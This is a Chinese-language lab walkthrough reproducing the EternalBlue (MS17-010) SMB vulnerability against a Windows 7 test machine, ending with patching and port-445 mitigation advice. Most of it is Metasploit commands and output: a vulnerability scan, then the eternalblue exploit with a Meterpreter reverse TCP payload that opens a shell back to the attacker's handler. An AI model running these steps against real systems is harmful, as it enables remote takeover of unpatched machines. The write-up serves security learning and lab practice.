永恒之蓝漏洞利用(MS17-010)

漏洞描述

---

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

操作系统漏洞，大家肯定听说过耳熟能详的永恒之蓝（MS17-010）了，他的爆发源于WannaCry勒索病毒的诞生。

参考：https://www.jianshu.com/p/4c92a9815dcc

---

影响版本

---

Windows未装有ms17-010漏洞补丁的操作系统。

---

FOFA语句

无

环境搭建

攻击机：kali 2021

受害机：Windows 7

漏洞复现

1.使用nmap的漏洞扫描功能;

nmap --script=vuln 192.168.220.130

2.使用metasploit的永恒之蓝漏洞扫描功能；

# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] 	/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.99-dev                          ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 345 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

[*] Starting persistent handler(s)...
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.220.130
rhosts => 192.168.220.130
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.220.130:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.220.130:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

3.使用metasploit的永恒之蓝漏洞利用；

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.220.130
rhosts => 192.168.220.130
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.220.138:4444 
[*] 192.168.220.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.220.130:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.220.130:445   - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.220.130:445 - Connecting to target for exploitation.
[+] 192.168.220.130:445 - Connection established for exploitation.
[+] 192.168.220.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.220.130:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.220.130:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.220.130:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.220.130:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.220.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.220.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.220.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.220.130:445 - Starting non-paged pool grooming
[+] 192.168.220.130:445 - Sending SMBv2 buffers
[+] 192.168.220.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.220.130:445 - Sending final SMBv2 buffers.
[*] 192.168.220.130:445 - Sending last fragment of exploit packet!
[*] 192.168.220.130:445 - Receiving response from exploit packet
[+] 192.168.220.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.220.130:445 - Sending egg to corrupted connection.
[*] 192.168.220.130:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.220.130
[*] Meterpreter session 1 opened (192.168.220.138:4444 -> 192.168.220.130:51055) at 2021-12-07 02:30:09 -0500
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

修复建议

受影响的系统版本可以参照：https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

• 关闭445端口。
• 打开防火墙，安装安全软件。
• 安装对应补丁。